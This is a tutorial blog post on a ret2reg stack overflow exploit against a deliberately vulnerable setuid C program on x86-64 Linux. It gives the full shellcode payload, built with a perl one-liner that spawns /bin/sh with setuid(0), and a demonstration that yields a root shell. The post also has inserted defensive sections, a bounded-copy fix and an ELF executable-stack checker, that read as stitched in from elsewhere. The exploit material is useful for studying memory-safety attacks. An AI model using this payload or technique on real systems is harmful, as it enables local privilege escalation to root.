Stack Overflow Attack series: Shellcode root privileges in Linux x86 64-bit attacks (vii) exploit register attacks

Source: Internet
Author: User

In (vi) we used a fixed stack address for the attack, but in practice the system default is not 0; you can check the setting with:

cat /proc/sys/kernel/randomize_va_space

So the attack from part (vi) of the series loses its meaning. There is always another loophole, though: we have a second attack that relies on a register instead of a fixed stack address.

Vulnerability Code

vulnerableret2reg.c

#include <stdio.h>
#include <string.h>

void evilfunction(char *input)
{
    char buffer[1000];
    strcpy(buffer, input);   /* unbounded copy: the overflow the post exploits */
}

int main(int argc, char **argv)
{
    evilfunction(argv[1]);
    return 0;
}
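As an added example (not part of the original post), here is the hardened counterpart of the program above: the unbounded strcpy is replaced by a copy that refuses any argument that does not fit in buffer together with its terminator, so an over-long argv[1] can no longer reach the saved rbp or the return address. The names bounded_copy, safefunction and oversized_demo are mine; oversized_demo feeds the function a constructed input of a chosen length, including the 1016-byte overflow length the post computes later.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 1000   /* same buffer size as the vulnerable evilfunction */

/* Copy src into dst[dst_size] only if it fits together with its NUL terminator.
 * Returns 0 on success and -1 (leaving dst as an empty string) on rejection,
 * so an over-long argument can never run past the end of the buffer. */
int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    size_t n = strlen(src);
    if (dst_size == 0) return -1;
    if (n >= dst_size) {
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);
    return 0;
}

/* Hardened counterpart of evilfunction (hypothetical name): returns 0 if the
 * input was accepted and 1 if it was rejected as too long. */
int safefunction(const char *input)
{
    char buffer[BUF_SIZE];
    if (bounded_copy(buffer, sizeof buffer, input) != 0) {
        fprintf(stderr, "rejected: input is %zu bytes, limit is %d\n",
                strlen(input), BUF_SIZE - 1);
        return 1;
    }
    /* buffer can be used here: it is always NUL-terminated and within bounds */
    return 0;
}

/* Feed safefunction a constructed input of `len` 'A' bytes and return its verdict.
 * len = 1016 is the overflow length the post computes for the original program. */
int oversized_demo(size_t len)
{
    char *input = malloc(len + 1);
    if (input == NULL) return -1;
    memset(input, 'A', len);
    input[len] = '\0';
    int rc = safefunction(input);
    free(input);
    return rc;
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        printf("999 bytes -> %d, 1000 bytes -> %d, 1016 bytes -> %d\n",
               oversized_demo(999), oversized_demo(1000), oversized_demo(1016));
        return 0;
    }
    return safefunction(argv[1]);
}
```

Build it with plain gcc (without -z execstack) and run it with no arguments to see the three verdicts; a 999-byte argument is accepted, 1000 or more bytes are rejected before any copy happens. The length check fixes the overflow itself; the non-executable stack and ASLR the post mentions are separate layers that only make a remaining bug harder to exploit.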

Let's first look at the function strcpy:

char *strcpy(char *dest, const char *src);

strcpy returns dest, so when it returns, the rax register holds the address of the dest array. Here dest is buffer in evilfunction, so rax holds the starting address of buffer. Fortunately, evilfunction performs no operation on rax after the strcpy call, and evilfunction has no return value (rax is the return-value register), so rax still points at the start of buffer when the function returns.

Disassembly of evilfunction

00000000004004c4 <evilfunction>:
  4004c4:  push   %rbp
  4004c5:  mov    %rsp,%rbp
  4004c8:  sub    $0x400,%rsp
  4004cf:  mov    %rdi,-0x3f8(%rbp)
  4004d6:  mov    -0x3f8(%rbp),%rdx
  4004dd:  lea    -0x3f0(%rbp),%rax
  4004e4:  mov    %rdx,%rsi
  4004e7:  mov    %rax,%rdi
  4004ea:  callq  4003c8 <strcpy@plt>
  4004ef:  leaveq
  4004f0:  retq


We see that no instruction after the callq changes the rax register, so rax is our attack vector.

1. Find the address of a call *%rax instruction. Compile vulnerableret2reg.c into an executable and grep the disassembly for rax:

gcc -z execstack -o vulnerableret2reg vulnerableret2reg.c
objdump -d vulnerableret2reg | grep rax > rax.txt
cat rax.txt

  4003b4:  nopl   0x0(%rax)
  4003ed:  push   %rax
  400410:  mov    0x200489(%rip),%rax        # 6008a0 <_DYNAMIC+0x190>
  400417:  test   %rax,%rax
  40041c:  callq  *%rax
  400447:  mov    0x200492(%rip),%rax        # 6008e0 <dtor_idx.6351>
  40045d:  cmp    %rbx,%rax
  400462:  nopw   0x0(%rax,%rax,1)
  400468:  add    $0x1,%rax
  40046c:  mov    %rax,0x20046d(%rip)        # 6008e0 <dtor_idx.6351>
  400473:  callq  *0x6006f8(,%rax,8)
  40047a:  mov    0x20045f(%rip),%rax        # 6008e0 <dtor_idx.6351>
  400481:  cmp    %rbx,%rax
  400494:  data32 data32 nopw %cs:0x0(%rax,%rax,1)
  4004b3:  test   %rax,%rax
  4004be:  jmpq   *%rax
  4004dd:  lea    -0x3f0(%rbp),%rax
  4004e7:  mov    %rax,%rdi
  400500:  mov    -0x10(%rbp),%rax
  400504:  add    $0x8,%rax
  400508:  mov    (%rax),%rax
  40050b:  mov    %rax,%rdi
  400522:  data32 data32 data32 data32 nopw %cs:0x0(%rax,%rax,1)
  40057c:  nopl   0x0(%rax)
  4005c9:  mov    0x200118(%rip),%rax        # 6006e8 <__CTOR_LIST__>
  4005d0:  cmp    $0xffffffffffffffff,%rax
  4005db:  nopl   0x0(%rax,%rax,1)
  4005e4:  callq  *%rax
  4005e6:  mov    (%rbx),%rax
  4005e9:  cmp    $0xffffffffffffffff,%rax

Luckily, there is a callq *%rax:

  40041c:  ff d0  callq  *%rax

The instruction address is 0x40041c.

2. Calculate the distance to the return address

lea    -0x3f0(%rbp),%rax

That is, buffer starts at rbp-0x3f0, i.e. 1008 bytes below the saved rbp. Adding the 8 bytes of the saved rbp itself, the function's return address lies 1016 bytes from the start of buffer.

3. Fill the array

perl -e 'print "\x90"x16; print "\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"; print "\x90"x957; print "\x1c\x04\x40\x00"'

16 + 43 + 957 = 1016 bytes of padding (NOP sled, shellcode, NOP sled), followed by the instruction address 0x40041c written little-endian.

4. Execution of our shellcode

When the function returns, rip is set to 0x40041c and the machine instruction callq *%rax executes. Since rax holds the starting address of buffer, execution continues at the beginning of buffer. We only need to fill buffer with the shellcode we want to run, and the attack is complete.


Demonstration of the attack

gcc -z execstack -o vulnerableret2reg vulnerableret2reg.c
chmod u+s vulnerableret2reg
su test
./vulnerableret2reg `perl -e 'print "\x90"x16; print "\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"; print "\x90"x957; print "\x1c\x04\x40\x00"'`
sh-4.1# whoami
root


Everything works as designed: you become root.

Stack attacks are not simple

1. You need a buffer array long enough to hold your shellcode.

2. The program must not modify the register after the copy operation.

3. The program must contain an instruction that transfers control through that register, and you must be able to find its address.

4. Of course, the stack must also have been made executable at compile time.

5. To become root, the program needs the setuid (s) permission bit.
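Precondition 4 above is recorded in the binary itself: gcc -z execstack sets the PF_X flag on the PT_GNU_STACK program header, and a default build leaves it clear. As an added example (my code, not part of the original post), the checker below parses that header from an ELF64 image and reports the requested stack permissions, so a defender can audit setuid binaries for executable stacks before anyone reaches step 5. The ELF structs are declared locally with the same layout as the system <elf.h>; the function and struct names (stack_flags_of, build_image, demo_flags, stack_flags_of_file) are mine, and the test images are constructed in memory.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/* ELF64 header layouts, declared locally with the same field order and sizes as
 * <elf.h> so the checker builds without it. A little-endian host (x86-64) is assumed. */
struct elf64_ehdr {
    unsigned char e_ident[16];
    uint16_t e_type, e_machine;
    uint32_t e_version;
    uint64_t e_entry, e_phoff, e_shoff;
    uint32_t e_flags;
    uint16_t e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx;
};
struct elf64_phdr {
    uint32_t p_type, p_flags;
    uint64_t p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_align;
};

#define PT_GNU_STACK 0x6474e551u  /* program header carrying the requested stack permissions */
#define PT_LOAD      1u
#define PF_X 0x1u
#define PF_W 0x2u
#define PF_R 0x4u

enum { STACK_NX = 0, STACK_EXEC = 1, STACK_NO_HDR = -1, STACK_BAD_ELF = -2 };

/* Report what the PT_GNU_STACK header of an in-memory ELF64 image requests.
 * `gcc -z execstack` sets PF_X on it; a default build leaves PF_X clear. */
int stack_flags_of(const unsigned char *img, size_t len)
{
    struct elf64_ehdr eh;
    if (len < sizeof eh) return STACK_BAD_ELF;
    memcpy(&eh, img, sizeof eh);
    if (memcmp(eh.e_ident, "\177ELF", 4) != 0 || eh.e_ident[4] != 2 /* ELFCLASS64 */)
        return STACK_BAD_ELF;
    if (eh.e_phentsize != sizeof(struct elf64_phdr)) return STACK_BAD_ELF;
    for (uint16_t i = 0; i < eh.e_phnum; i++) {
        struct elf64_phdr ph;
        uint64_t off = eh.e_phoff + (uint64_t)i * sizeof ph;
        if (off > len || len - off < sizeof ph) return STACK_BAD_ELF;
        memcpy(&ph, img + off, sizeof ph);
        if (ph.p_type == PT_GNU_STACK)
            return (ph.p_flags & PF_X) ? STACK_EXEC : STACK_NX;
    }
    return STACK_NO_HDR;  /* no header at all: the loader applies its own default; review it */
}

/* Build a constructed minimal image (ELF header + one program header). Returns its length. */
size_t build_image(unsigned char *out, uint32_t p_type, uint32_t p_flags)
{
    struct elf64_ehdr eh = {0};
    struct elf64_phdr ph = {0};
    memcpy(eh.e_ident, "\177ELF", 4);
    eh.e_ident[4] = 2;                      /* ELFCLASS64 */
    eh.e_ident[5] = 1;                      /* ELFDATA2LSB */
    eh.e_ehsize = sizeof eh;
    eh.e_phoff = sizeof eh;
    eh.e_phentsize = sizeof ph;
    eh.e_phnum = 1;
    ph.p_type = p_type;
    ph.p_flags = p_flags;
    memcpy(out, &eh, sizeof eh);
    memcpy(out + sizeof eh, &ph, sizeof ph);
    return sizeof eh + sizeof ph;
}

/* Verdict for a constructed image whose single program header has the given type and flags. */
int demo_flags(uint32_t p_type, uint32_t p_flags)
{
    unsigned char img[sizeof(struct elf64_ehdr) + sizeof(struct elf64_phdr)];
    size_t n = build_image(img, p_type, p_flags);
    return stack_flags_of(img, n);
}

/* Verdict for an image cut off inside the ELF header (a truncated or non-ELF file). */
int demo_truncated(void)
{
    unsigned char img[sizeof(struct elf64_ehdr) + sizeof(struct elf64_phdr)];
    build_image(img, PT_GNU_STACK, PF_R | PF_W | PF_X);
    return stack_flags_of(img, 20);
}

/* Check a binary on disk, e.g. the vulnerableret2reg the post builds. Program
 * headers sit at the start of the file, so the first 1 MiB is enough to read. */
int stack_flags_of_file(const char *path)
{
    FILE *f = fopen(path, "rb");
    if (f == NULL) return STACK_BAD_ELF;
    unsigned char *buf = malloc(1 << 20);
    size_t n = buf ? fread(buf, 1, 1 << 20, f) : 0;
    fclose(f);
    int rc = buf ? stack_flags_of(buf, n) : STACK_BAD_ELF;
    free(buf);
    return rc;
}

int main(int argc, char **argv)
{
    static const char *names[] = { "bad ELF", "no PT_GNU_STACK", "stack NX", "stack EXECUTABLE" };
    if (argc < 2) {
        printf("constructed -z execstack image: %s\n", names[demo_flags(PT_GNU_STACK, PF_R | PF_W | PF_X) + 2]);
        printf("constructed default image:      %s\n", names[demo_flags(PT_GNU_STACK, PF_R | PF_W) + 2]);
        return 0;
    }
    for (int i = 1; i < argc; i++)
        printf("%s: %s\n", argv[i], names[stack_flags_of_file(argv[i]) + 2]);
    return 0;
}
```

Run it as ./checker ./vulnerableret2reg to see "stack EXECUTABLE" for the binary built with -z execstack and "stack NX" for one built without it; with no arguments it evaluates the two constructed images. The same information is what readelf -lW prints in the GNU_STACK line, so this is a way to script that check across a set of setuid binaries.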
